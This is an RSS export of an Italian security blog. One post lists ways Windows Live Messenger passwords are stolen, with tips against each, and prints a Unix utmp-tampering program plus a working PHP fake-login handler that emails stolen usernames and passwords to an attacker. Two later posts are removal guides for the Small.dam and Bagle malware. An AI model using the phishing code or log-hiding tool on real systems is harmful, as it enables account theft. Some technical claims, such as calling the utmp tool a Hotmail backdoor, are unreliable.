<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet type='text/xsl' href='http://crypto1993.spaces.live.com/mmm2008-07-24_12.50/rsspretty.aspx?rssquery=en-US;http%3a%2f%2fcrypto1993.spaces.live.com%2fcategory%2fSafety%2bWeb%2bArea%2b-%2bSicurezza%2binformatica%2bsul%2bWeb%2be%2bper%2bil%2bPC%2ffeed.rss' version='1.0'?><rss version="2.0" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:msn="http://schemas.microsoft.com/msn/spaces/2005/rss" xmlns:live="http://schemas.microsoft.com/live/spaces/2006/rss" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:cf="http://www.microsoft.com/schemas/rss/core/2005" xmlns:wfw="http://wellformedweb.org/CommentAPI/"><channel><title>IL RUBATORE DI PASSWORD!: Safety Web Area - Sicurezza informatica sul Web e per il PC</title><description /><link>http://crypto1993.spaces.live.com/?_c11_BlogPart_BlogPart=blogview&amp;_c=BlogPart&amp;partqs=catSafety%2bWeb%2bArea%2b-%2bSicurezza%2binformatica%2bsul%2bWeb%2be%2bper%2bil%2bPC</link><language>en-US</language><pubDate>Sat, 23 Aug 2008 17:28:08 GMT</pubDate><lastBuildDate>Sat, 23 Aug 2008 17:28:08 GMT</lastBuildDate><generator>Microsoft Spaces v1.1</generator><docs>http://www.rssboard.org/rss-specification</docs><ttl>60</ttl><cf:parentRSS>http://crypto1993.spaces.live.com/blog/feed.rss</cf:parentRSS><live:type>blogcategory</live:type><live:identity><live:id>-9036054891036908415</live:id><live:alias>crypto1993</live:alias></live:identity><cf:listinfo><cf:group ns="http://schemas.microsoft.com/live/spaces/2006/rss" element="typelabel" label="Type" /><cf:group ns="http://schemas.microsoft.com/live/spaces/2006/rss" element="tag" label="Tag" /><cf:group element="category" label="Category" /><cf:sort element="pubDate" label="Date" data-type="date" default="true" /><cf:sort element="title" label="Title" data-type="string" /><cf:sort ns="http://purl.org/rss/1.0/modules/slash/" element="comments" label="Comments" data-type="number" /></cf:listinfo><item><title>Nozioni base di sicurezza per Windows Live Messenger</title><link>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!561.entry</link><description>&lt;div&gt;&lt;span style="font-family:Arial"&gt;&lt;span style="font-size:14pt;line-height:100%"&gt;&lt;font size=3&gt;Secondo una statistica, di cui non ricordo mai la provenienza, il primo programma instant-messaging utilizzato in tutto il mondo é Windows Live Messenger di casa Microsoft, seguito da Yahoo! Messenger. Proprio perché é il più usato, Windows Live Messenger é anche quello più soggetto a malintenzionati che vogliono ribare la password altrui, ma come fare a tenersi al riparo da questi ritardati mentali? Ecco i modi che un utente può utilizzare per riuscire a prendervi la password:&lt;br&gt;&lt;br&gt;1) tramite una chiavetta USB, l'utente può avviare un programma, spesso di tipo sniffer o spoofing, che capta le password. SOLUZIONE: non memorizzare mai la password nel PC;&lt;br&gt;&lt;br&gt;2) utilizzando un attacco che gli hacker chiamano brute force, ovvero forza bruta, e proprio perché é un attacco di forza bruta l'utente tira ad indovinare. SOLUZIONE: usate una password che contenga numeri, lettere e caratteri speciali. Eccone una: ]}°òPò876§§§@[*};&lt;br&gt;&lt;br&gt;3) tramite la domanda segreta, utilizzata in tutti quei casi l'utente si dimentichi la password (SOLUZIONE: vi serve più fosforo). Infatti il malintenzionato può tentare di indovinare la risposta alla domanda, specialmente se vi conosce. SOLUZIONE: aggiungete alla fine della risposta una parola senza senso che non c'entri nulla col resto della risposta;&lt;br&gt;&lt;br&gt;4) utilizzando il social engineering: molti utenti si creano indirizzi e-mail del tipo msn_staff@hotmail.it o supporto@hotmail.it, vi inseriscono tra i loro contatti e vi convincono di dargi la password e l'indirizzo e-mail poiché sono in corso degli aggiornamenti nei loro database. SOLUZIONE: state alla larga da questi contatti;&lt;br&gt;&lt;br&gt;5) usando programmi come Messenger Pass, il Keylogger o addirittura l'apparente innocuo RockXP;&lt;br&gt;&lt;br&gt;6) usando il Cookie Grabbing, che é semplicemente indistruttibile, ma siccome é stato fixato il bug che tale tecnica usufruiva é, attualmente, inutilizzabile, ma se dovessero risistemarlo, non avrete scampo. SOLUZIONE: eliminate tutti i cookie dopo ogni navigazione ed utilizzate ripulitori di sistema ed antivirus a volontà;&lt;br&gt;&lt;br&gt;7) usando exploit, ovvero dei programmi backdoor che inserendosi nel server di Hotmail ruba le password a bizzeffe. Ad esempio un codice sorgente di una backdoor (in ambiente UNIX) é il seguente:&lt;br&gt;&lt;br&gt;&lt;/font&gt;
&lt;div align=center&gt;
&lt;div align=left&gt;&lt;b&gt;&lt;font size=3&gt;CODICE&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font size=3&gt;-= INIZIO CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;br&gt;&lt;br&gt;#include &amp;lt;stdio.h&amp;gt;&lt;br&gt;#include &amp;lt;fcntl.h&amp;gt;&lt;br&gt;#include &amp;lt;sys/types.h&amp;gt;&lt;br&gt;#include &amp;lt;utmp.h&amp;gt;&lt;br&gt;#include &amp;lt;sys/stat.h&amp;gt;&lt;br&gt;&lt;br&gt;struct utmp *user;&lt;br&gt;char *usrt;&lt;br&gt;&lt;br&gt;main (argc,argv)&lt;br&gt;int argc;&lt;br&gt;char *argv[];&lt;br&gt;{&lt;br&gt; int fatto=0, cnt=0, start=1, index=0;&lt;br&gt; char err[80];&lt;br&gt; if (argc == 1) printf(&amp;quot;Removing you from utmp\n&amp;quot;);&lt;br&gt; if (argc == 2) printf(&amp;quot;Changing your login to %­s\n&amp;quot;,argv[1]);&lt;br&gt; utmpname(&amp;quot;/etc/utmp&amp;quot;);&lt;br&gt; usrt = strrchr(ttyname(0),'/');&lt;br&gt; strcpy(usrt,++usrt);&lt;br&gt; while (fatto != 1) {&lt;br&gt;   user = getutent();&lt;br&gt;   cnt++;&lt;br&gt;   if (strcmp(user-&amp;gt;ut_line,usrt) == 0) fatto=1;&lt;br&gt; }&lt;br&gt; utmpname(&amp;quot;/etc/utmp&amp;quot;);&lt;br&gt; for (start=0; start&amp;lt;cnt; start++) {&lt;br&gt;   user = getutent();&lt;br&gt; }&lt;br&gt; if (argc == 1) {&lt;br&gt;   user-&amp;gt;ut_type = LOGIN_PROCESS;&lt;br&gt;   strcpy(user-&amp;gt;ut_name,&amp;quot;LOGIN&amp;quot;);&lt;br&gt; }&lt;br&gt; else user-&amp;gt;ut_type = USER_PROCESS;&lt;br&gt; if (argc == 2) strcpy(user-&amp;gt;ut_name,argv[1]);&lt;br&gt; pututline(user);&lt;br&gt; endutent();&lt;br&gt;}&lt;br&gt;&lt;br&gt;-= FINE CODICE =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-&lt;/font&gt;&lt;/div&gt;&lt;/div&gt;&lt;br&gt;&lt;font size=3&gt;SOLUZIONE: utilizzate un buon Firewall ed eventualmente un buon router/modem;&lt;br&gt;&lt;br&gt;8) usando un fake login, ovvero utilizzare una pagina HTML identica a quella originale in cui eseguiamo il Log In nella nostra e-mail box di Hotmail, ma che invia la password ad un indirizzo di posta elettronica. Tutto si basa sull'uso di un file in PHP, di cui sono riuscito a trovarne il codice sorgente:&lt;br&gt;&lt;br&gt;&lt;/font&gt;
&lt;div align=center&gt;
&lt;div align=left&gt;&lt;b&gt;&lt;font size=3&gt;CODICE&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font size=3&gt;&amp;lt;?&lt;br&gt;&lt;br&gt;///////////////////////////////////&lt;br&gt;&lt;br&gt;$yourmail = &amp;quot;mioaccount@mail.it&amp;quot;;  //QUI E' DOVE VIENE MESSO L'INDIRIZZO DI POSTA ELETTRONICA DEL MALINTENZIONATO&lt;br&gt;&lt;br&gt;///////////////////////////////////&lt;br&gt;&lt;br&gt;// COMMENTI NON INSERITI&lt;br&gt;&lt;br&gt;if (getenv(HTTP_X_FORWARDED_FOR)){&lt;br&gt;$ip = getenv(HTTP_X_FORWARDED_FOR); } else {&lt;br&gt;$ip = getenv(REMOTE_ADDR); }&lt;br&gt;$useragent=$_SERVER['HTTP_USER_AGENT'];&lt;br&gt;    $td = date(&amp;quot;F jS&amp;quot;);&lt;br&gt;    $date = date(&amp;quot;d M, Y&amp;quot;);&lt;br&gt;    $time = date(&amp;quot;g:i a&amp;quot;);&lt;br&gt;    $LogTime = trim(&amp;quot; Date: &amp;quot;.$date.&amp;quot;, Time: &amp;quot;.$time);&lt;br&gt;&lt;br&gt;mail(&amp;quot;$yourmail&amp;quot;, &amp;quot;Account $account&amp;quot;, &amp;quot;Username: $account \nPassword: $password \n\nIndirizzo ip: $ip \nData log: $LogTime \nSystem Info: $useragent \n\nCoder SNaKE\nwww.myhackerzone.altervista.org&amp;quot;,&amp;quot;from: $account &amp;lt;$account&amp;gt;&amp;quot;);&lt;br&gt;header( &amp;quot;Location: https://login.passport.net/uilogin.srf?lc=1040&amp;amp;id=2&amp;quot;);&lt;br&gt;?&amp;gt;&lt;/font&gt;&lt;/div&gt;&lt;/div&gt;&lt;br&gt;&lt;font size=3&gt;SOLUZIONE: non loggatevi mai in siti Web che non siano di proprietà della MSN.&lt;/font&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-9036054891036908415&amp;page=RSS%3a+Nozioni+base+di+sicurezza+per+Windows+Live+Messenger&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=crypto1993.spaces.live.com&amp;amp;GT1=crypto1993"&gt;</description><comments>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!561.entry#comment</comments><guid isPermaLink="true">http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!561.entry</guid><pubDate>Fri, 10 Aug 2007 07:51:22 GMT</pubDate><slash:comments>2</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://crypto1993.spaces.live.com/blog/cns!82997BF3A0D06481!561/comments/feed.rss</wfw:commentRss><wfw:comment>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!561.entry#comment</wfw:comment><dcterms:modified>2007-08-10T07:51:22Z</dcterms:modified></item><item><title>Il demone delle reti P2P</title><link>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!528.entry</link><description>&lt;div align=center&gt;&lt;font size=6&gt;&lt;em&gt;Il demone delle reti P2P&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;
&lt;hr&gt;
&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face="Garamond, Times, Serif" color="#ff0000" size=5&gt;Oramai per molti utenti è consuetudine utilizzare un software P2P come eMule, che possiamo definire come il nostro &amp;quot;centro commerciale virtuale&amp;quot;. Molti non sanno però che le reti usate da questi software sono assai esposte a virus e pirati informatici. Tra i virus, infatti, ce n'è uno in particolare: &lt;font color="#ffff00"&gt;Small.dam&lt;/font&gt;&lt;font color="#ff0000"&gt;.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff00ff" size=5&gt;&lt;/font&gt; &lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff00ff" size=5&gt;DESCRIZIONE VIRUS&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;Small.dam è un particolare trojan, che occupa 29.347 byte circa e che è mirato verso i S. O. Windows (9X, ME, NT, 2000 ed XP). La sua diffusione è alta, ma il livello della sua infezione è di livello medio. Small.dam è stato creato in seguito all'evento dell'uragano Kryll, che ha attraversato il nord Europa, creando seri problemi. Proprio per questo, i virus writer hanno approfittato della drammaticità della situazione per creare tale trojan.&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;&lt;/font&gt; &lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff00ff" size=5&gt;COSA E' IN GRADO DI PROCURARE&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;Small.dam è un virus che si occupa delle reti P2P utilizzando la porta UDP. Lo scopo del virus è questo: stabilirsi all'interno del registro di sistema e creare una backdoor, che può essere usata da un qualsiasi pirata informatico per controllare il PC infetto ogniqualvolta esso si trovi connesso ad Internet. Oltre questo, Small.dam riduce il PC ad un botnet, ovvero un PC &amp;quot;zombie&amp;quot; inserito nel contesto di una rete il cui scopo è fornire spamming e atti di phishing. Quando si acquisisce il virus, esso crea una nuova chiave nel registro di sistema, chiamata &lt;font color="#ffff00"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wincom32&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;e un file EXE che si va ad inserire nella directory &lt;font color="#ffff00"&gt;C:\Windows\System32\&lt;/font&gt;&lt;font color="#ff0000"&gt;, chiamato &lt;/font&gt;&lt;font color="#ffff00"&gt;wincom32.sys&lt;/font&gt;&lt;font color="#ff0000"&gt;. Tale file può essere acquisito quando si clicca in un e-mail in cui vengono dette delle cose inerenti all'uragano Kryll, che sono assolutamente false. Addirittura, in una di queste e-mail si dice che Saddam Hussein sia ancora vivo.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;La chiave che viene creata da Small.dam ha invece il compito di attuare il processo &lt;font color="#ffff00"&gt;services.exe&lt;/font&gt;&lt;font color="#ff0000"&gt;, che permette al trojan di attivarsi sempre, ogniqualvolta si avvia Windows. Naturalmente, Small.dam non poteva fermarsi: dopo tutte queste operazioni, continua la sua infezione creando il file &lt;/font&gt;&lt;font color="#ffff00"&gt;peers.ini&lt;/font&gt;&lt;font color="#ff0000"&gt; inserito nella cartella &lt;/font&gt;&lt;font color="#ffff00"&gt;C:\Windows&lt;/font&gt;&lt;font color="#ff0000"&gt;, con la quale Small.dam ottiene una lista di IP Adress usati dal software P2P con la quale potersi diffondere. In poche parole, si crea i suoi trampolini di lancio. Successivamente, mettendosi in connessione con gli altri PC infetti (tramite la lista peers), scarica sul sistema vittima il rootkit &lt;/font&gt;&lt;font color="#ffff00"&gt;game0.exe&lt;/font&gt;&lt;font color="#ff0000"&gt;, che nei laboratori Symantec viene definito come &lt;/font&gt;&lt;font color="#ffff00"&gt;Trojan.Abwiz.F&lt;/font&gt;&lt;font color="#ff0000"&gt;, e gli eseguibili &lt;/font&gt;&lt;font color="#ffff00"&gt;game1.exe&lt;font color="#ff0000"&gt;,&lt;/font&gt; game2.exe&lt;font color="#ff0000"&gt;, &lt;/font&gt;game3.exe&lt;font color="#ff0000"&gt; e&lt;/font&gt; game4.exe&lt;/font&gt;&lt;font color="#ff0000"&gt;, che sono, tra l'altro, varianti del worm &lt;/font&gt;&lt;font color="#ffff00"&gt;W32.Mixor.Q@mm&lt;font color="#ff0000"&gt;; gli eseguibili hanno la capacità di rubare gli indirizzi presenti nella ribrica e continuando lo spamming. Insomma, Small.dam è un vero incubo per tutti gli utenti.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;&lt;/font&gt; &lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff00ff" size=5&gt;COME E' POSSIBILE ELIMINARLO&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;Come ogni virus pericoloso che si rispetti anche Small.dam ci rode nell'eliminarlo. Occorre dire che le operazioni di eliminazione del virus sono parecchie...&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#ff0000" size=5&gt;&lt;/font&gt; &lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#00ff00" size=5&gt;disabilitazione del ripristino configurazione del sistema&lt;font color="#ff0000"&gt; - questo ci permetterà, in seguito, di non ritrovarci di nuovo con Small.dam. Questo, da una parte, è un punto a nostro vantaggio, dall'altra, invece, può capitare che il sistema faccia una copia di backup infetta, ma noi rischiamo (certamente avrete capito che a me piacciono MOLTO le sfide &lt;img src="http://shared.live.com/VIf!VWmJbs6tK-ObyYk28Q/emoticons/smile_tongue.gif"&gt; ). Andate su &lt;/font&gt;&lt;font color="#ffff00"&gt;Start - Pannello di controllo - Sistema - Ripristino configurazione di sistema - Disattiva Ripristino configurazione di sistema - Applica&lt;/font&gt;&lt;font color="#ff0000"&gt;;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#00ff00" size=5&gt;blocco dei processi in esecuzione &lt;font color="#ff0000"&gt;- occorre, dopo la fase 1, lavorare in ambiente protetto e con i processi bloccati: occorre, quindi, &lt;/font&gt;&lt;font color="#ffff00"&gt;avviare il sistema in modalità provvisoria&lt;/font&gt;&lt;font color="#ff0000"&gt;: se riavviate il PC, prima del caricamento del logo di Windows premete il tasto &lt;/font&gt;&lt;font color="#ffff00"&gt;F8&lt;/font&gt;&lt;font color="#ff0000"&gt;, e poi fate Invio sulla voce &lt;/font&gt;&lt;font color="#ffff00"&gt;Riavvia il sistema in modalità provvisoria&lt;/font&gt;&lt;font color="#ff0000"&gt;;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#00ff00" size=5&gt;rimozione del trojan (PARTE I) &lt;font color="#ff0000"&gt;- adesso viene la parte dell'eliminazione. Dopo che Small.dam ci ha rotto le scatole, finalmente lo possiamo mandare a casa. Per rimuovere il trojan, basta che aggiorniate il vostro antivirus preferito (io ho 3 antivirus... poi voi fate quello che volete) e che avviate una full scan del sistema. Fatto questo, l'antivirus vi DEVE dare traccia del virus. Naturalmente, eliminatelo e non siate clementi; successivamente, riavviate il sistema;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#00ff00" size=5&gt;rimozione del trojan (PARTE II) &lt;font color="#ff0000"&gt;- adesso che il trojan è scomparso (assicuratevi che ogni traccia di quest'ultimo sia scomparsa prima di procedere), possiamo procedere all'eliminazione delle sottochiavi create dal file wincom32.sys. Innanzitutto, dobbiamo accedere al registro di sistema: &lt;/font&gt;&lt;font color="#ffff00"&gt;Start - Esegui - regedit - Invio&lt;/font&gt;&lt;font color="#ff0000"&gt;. Verrete catapultati nel registro di sistema. Adesso, dalla voce &lt;/font&gt;&lt;font color="#ffff00"&gt;File&lt;/font&gt;&lt;font color="#ff0000"&gt;, cliccate su &lt;/font&gt;&lt;font color="#ffff00"&gt;Esporta&lt;/font&gt;&lt;font color="#ff0000"&gt;, verifichiamo che la voce Tutto sia selezionata: in questo modo, avrete una copia di backup delle chiavi del registro di sistema. Date un nome al file e poi salvate. Adesso identifichiamo la sottochiave &lt;/font&gt;&lt;font color="#ffff00"&gt;HKEY_LOCAL_MACHINES\SYSTEM\CurrentControlSet\Services\wincom32&lt;/font&gt;&lt;font color="#ff0000"&gt; e selezioniamola, dopodiché eliminiamola;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font face=Garamond color="#00ff00" size=5&gt;rimozione del trojan (PARTE III) &lt;font color="#ff0000"&gt;- adesso dobbiamo veramente sicerarci che non ci sia nessuan traccia né del trojan né dei suoi derivati. Ultimi file da eliminare sono il rootkit Trojan.Abwiz.F e i file game[1-2-3-4].exe, che sono varianti del worm W32.Mixor.Q@mm. Per quest'ultima operazione, dobbiamo utilizzare un apposito tool, denominato &lt;font color="#ffff00"&gt;FixAbwiz&lt;/font&gt;&lt;font color="#ff0000"&gt;, che può essere facilmente scaricato dal link &lt;a href="http://securityresponse.symantec.com/avcenter/FizAbwiz.exe"&gt;http://securityresponse.symantec.com/avcenter/FizAbwiz.exe&lt;/a&gt;. Con esso, avviamo una scansione, che tra l'altro dovrebbe durare pochi minuti.&lt;/font&gt; Con il tool abbiamo cancellato dalla faccia del PC il rootkit, ma le varianti del worm, cioè i file game[1-2-3-4].exe dovranno essere tolti manualemente. Apriamo l'editor e cerchaimo le sottochiavi &lt;/font&gt;&lt;font color="#ffff00"&gt;HKEY_LOCAL_MACHINES\SOFTWARE\Microsoft\Windows\CurrentVersion\Run &lt;/font&gt;&lt;font color="#ff0000"&gt;e &lt;/font&gt;&lt;font color="#ffff00"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersione\Run&lt;/font&gt;&lt;font color="#ff0000"&gt;. Attenzioniamo la prima sottochiave. Nella parte destra cerchiamo la voce &lt;/font&gt;&lt;font color="#ffff00"&gt;&amp;quot;agent&amp;quot;= &amp;quot;%System%\ppl.exe&amp;quot; oppure &amp;quot;agent&amp;quot;=%System%\alsys.exe&amp;quot;&lt;/font&gt;&lt;font color="#ff0000"&gt;. Se la troviamo, eliminiamola. Adesso focalizziamoci sulla seconda sottochiave. Con la stessa procedura, eliminiamo i valori &lt;/font&gt;&lt;font color="#ffff00"&gt;&amp;quot;taskdir&amp;quot;=&amp;quot;%System%\taskdir.exe&amp;quot; &lt;/font&gt;&lt;font color="#ff0000"&gt;e &lt;/font&gt;&lt;font color="#ffff00"&gt;&amp;quot;adir&amp;quot;=&amp;quot;%System%\adirss.exe&amp;quot;&lt;/font&gt;&lt;font color="#ff0000"&gt;. Adesso cerchiamo la sottochiave &lt;/font&gt;&lt;font color="#ffff00"&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess&lt;/font&gt;&lt;font color="#ff0000"&gt;. Dopo aver individuato la voce Start riportiamo valore al default: ecco il modo per farlo: scegliete la voce &lt;/font&gt;&lt;font color="#ffff00"&gt;Modifica&lt;/font&gt;&lt;font color="#ff0000"&gt; e digitiamo il valore &lt;/font&gt;&lt;font color="#ffff00"&gt;4&lt;/font&gt;&lt;font color="#ff0000"&gt; nel campo Dati valore, alla fine facciamo clic su Ok.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/ol&gt;
&lt;p align=left&gt;
&lt;hr&gt;
&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-9036054891036908415&amp;page=RSS%3a+Il+demone+delle+reti+P2P&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=crypto1993.spaces.live.com&amp;amp;GT1=crypto1993"&gt;</description><comments>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!528.entry#comment</comments><guid isPermaLink="true">http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!528.entry</guid><pubDate>Fri, 06 Apr 2007 10:42:53 GMT</pubDate><slash:comments>2</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://crypto1993.spaces.live.com/blog/cns!82997BF3A0D06481!528/comments/feed.rss</wfw:commentRss><wfw:comment>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!528.entry#comment</wfw:comment><dcterms:modified>2007-04-06T10:42:53Z</dcterms:modified></item><item><title>Un nuovo nemico: Win32/Bagle</title><link>http://crypto1993.spaces.live.com/Blog/cns!82997BF3A0D06481!410.entry</link><description>&lt;div align=center&gt;&lt;font face="Verdana, Geneva, Arial, Sans-serif" color="#33cccc" size=6&gt;Un nuovo nemico per il PC:&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#33cccc" size=6&gt;&lt;/font&gt; &lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#ff9900" size=6&gt;Win32/Bagle&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;
&lt;hr&gt;
&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;Bagle è un nuovo virus abbastanza fastidioso. Più tecnicamente, è un worm polimorfo, che attacca i software di sicurezza, disablitando sia essi che i servizi di Windows.&lt;/font&gt;&lt;/em&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;/font&gt;&lt;/em&gt; &lt;/div&gt;
&lt;div align=center&gt;&lt;font color="#ff0000" size=5&gt;&lt;em&gt;I sistemi vulnerabili a Bagle sono Windows 9x/ME/NT/200/XP/Server 2003&lt;/em&gt;&lt;/font&gt;&lt;/div&gt;
&lt;div align=center&gt;&lt;em&gt;
&lt;hr&gt;
&lt;/em&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font color="#ffff00" size=5&gt;Come sbarazzarsi di Bagle&lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font color="#ff6600"&gt;&lt;/font&gt;&lt;font size=5&gt; &lt;/font&gt;&lt;/div&gt;
&lt;div align=left&gt;&lt;font color="#ff6600" size=5&gt;In questo caso, i software di sicurezza vengono disabilitati, e quindi non possiamo contare sul loro prezioso aiuto. Innanzitutto occorre &amp;quot;snidiare&amp;quot; il nostro amico, che si è intrufolato nell'hard disk:&lt;/font&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ff00ff" size=5&gt;occorre fare una full scan dell'hard disk. Quando finite la scansione, dovete copiare i risultati della scansione;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font size=5&gt;&lt;font color="#ff00ff"&gt;copiate i risultati ed incollateli in una nuova pagina del Blocco Note (&lt;/font&gt;&lt;font color="#ffff00"&gt;Start - Tutti i programmi - Accessori - Blocco Note&lt;/font&gt;&lt;font color="#ff00ff"&gt;). A questo punto controllate se nell'elenco sono presenti i file &lt;/font&gt;&lt;font color="#ff6600"&gt;hldrrr.exe&lt;/font&gt;&lt;font color="#ff00ff"&gt;, &lt;/font&gt;&lt;font color="#ff6600"&gt;wintems.exe &lt;/font&gt;&lt;font color="#ff00ff"&gt;e &lt;/font&gt;&lt;font color="#ff6600"&gt;hidr.exe&lt;/font&gt;&lt;font color="#ff00ff"&gt; e poi cercate i driver &lt;/font&gt;&lt;font color="#00ff00"&gt;m_hook.sys&lt;/font&gt;&lt;font color="#ff00ff"&gt;;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ff00ff" size=5&gt;adesso, avviando il Task Manager di Windows, reperibile premendo la sequenza di tasti Ctrl+Alt+Canc, controlliamo nel tab Processi se tra le varie operazioni è presente il primo tipo di file citato nel punto 2 (hldrrr.exe). Se questo è presente, allora possiamo continuare l'eliminazione;&lt;/font&gt;&lt;/div&gt;&lt;/ol&gt;
&lt;p align=left&gt;&lt;font color="#ff00ff" size=5&gt;PREMESSA - Quando una macchina è stata infetta da un qualsiasi tipo di virus, è assai probabile che il sistema faccia delle copie di backup dei codici nocivi, il che comporta una riapparsa del virus, anche dopo la sua rimozione. Per procedere quindi dobbiamo disattivare questo strumento. Andando su &lt;font color="#ff0000"&gt;Start - Impostazioni - Pannello di controllo - Sistema &lt;/font&gt;&lt;font color="#ff00ff"&gt;(cliccare sull'icona per due volte) e dirigersi sul tab &lt;/font&gt;&lt;font color="#ff0000"&gt;Ripristino configurazione di sistema&lt;/font&gt;&lt;font color="#ff00ff"&gt;, da cui spuntiamo &lt;/font&gt;&lt;font color="#ff0000"&gt;Disattiva Ripristino configurazione di sistema&lt;/font&gt;&lt;font color="#ff00ff"&gt;; alla fine applichiamo le modifiche.&lt;/font&gt;&lt;/font&gt; 
&lt;ul&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ffcc00" size=5&gt;Bagle è uno di quei virus che non permettono il funzionamento dei sistemi di sicurezza del software, il che ci rende più difficile la sua rimozione. Occorre quindi usare un software che permette di bypassare il problema. In questo caso, è consigliabile usare &lt;font color="#0000ff"&gt;The Avenger&lt;/font&gt;&lt;font color="#ffcc00"&gt;. Se apriamo The Avenger, spuntiamo Load Script from file:. Occorre adesso creare lo script da caricare col nostro software;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
&lt;li&gt;
&lt;div align=left&gt;&lt;font color="#ffcc00" size=5&gt;aprite il Blocco Note ed immettiamo un nome qualsiasi. Il contenuto della nuova pagina dovrà contenere i dati che vi ho immesso qui di seguito:&lt;/font&gt;&lt;/div&gt;&lt;/ul&gt;
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;&lt;strong&gt;Files to delete&lt;/strong&gt;&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\m_hook.sys&lt;/font&gt;&lt;/em&gt; 
&lt;p align=left&gt;&lt;em&gt;&lt;font color="#ff0000" size=5&gt;%SystemDrive%:\Documents and Settings\[Utente corrente]\Dati Applicazioni\hidires\hidr.exe&lt;/font&gt;&lt;/em&gt; 
